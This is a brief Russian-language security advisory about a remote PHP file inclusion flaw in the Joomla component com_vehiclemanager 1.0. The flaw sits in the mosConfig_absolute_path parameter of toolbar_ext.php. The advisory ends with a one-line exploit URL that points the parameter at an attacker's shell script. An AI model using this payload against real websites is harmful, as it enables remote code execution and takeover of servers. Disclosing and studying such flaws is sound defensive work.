Программа: Joomla Component com_vehiclemanager 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «mosConfig_absolute_path» сценарием toolbar_ext.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.

Эксплоит:

/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=shell?



Оставить мнение